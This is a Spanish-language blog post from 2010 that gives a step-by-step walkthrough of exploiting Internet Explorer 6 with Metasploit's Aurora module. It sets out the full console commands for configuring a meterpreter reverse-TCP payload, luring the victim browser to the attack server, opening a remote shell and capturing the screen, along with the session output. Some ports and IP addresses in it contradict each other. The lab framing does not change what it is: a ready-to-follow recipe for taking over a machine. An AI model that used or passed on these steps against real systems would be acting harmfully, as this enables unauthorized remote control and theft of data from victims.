jueves, enero 21, 2010

Hoy hice una prueba de penetracion y salio todo ok

primero la penetracion se hizo a IE 6 no lo he probado en otro es una falla de seguridad en IE q permite tomar control de la shell de la maquina atacada con locual podrias bajar subir archivos o ejecutar programas en la pc victima

herramientas usadas
- Metasploit

Victima
- IE 6

escenario :

tienes una maquina A y una maquina B y necesitas entrar en  la maquina con la maquina A
la maquina A con ip 192.168.0.6 y la B con 192.168.0.51

lo primero q tienes q hacer es instalar en ala maquina atacante el programa de penetracion Metasploit  q es un opensource q lo puedes encontrar en aqui esto te instala la herramientas para penetrar
cuando hayas de terminado de instalar debes de ejecutar el programa y seguir estos pasos
  en la shell q te aparece escribe



msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST 192.168.0.6
msf exploit(ie_aurora) > set LPORT 4446
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

 hasta ahora has cargado el exploit  parametrizado la ip el puerto y el servidor web
set LHOST define la ip
set LPORT define el puerto a utilizar
set URIPATH / define q tu sitio web es de raiz
  exploit ejecuta el exploit y levanta el server web q espera q alguien le haga el requerimiento a el




ahora desde la maquina victima  abre con IE un ventana y pon http://192.168.0.6:800/

veras este mensaje

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.6:4446 -> 192.168.0.51:1514)


acabas de abrir una sesion

 escribe estos parametros y lista  abres una session y es como si estubieras en la maquina

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer




meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>  



si quieres caopturar la pantalla en un bpm


meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp




para mas informacion


http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html

si te gusta los videos

http://www.mygeekside.com/?p=767
Publicadas por a la/s

0 comentarios:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)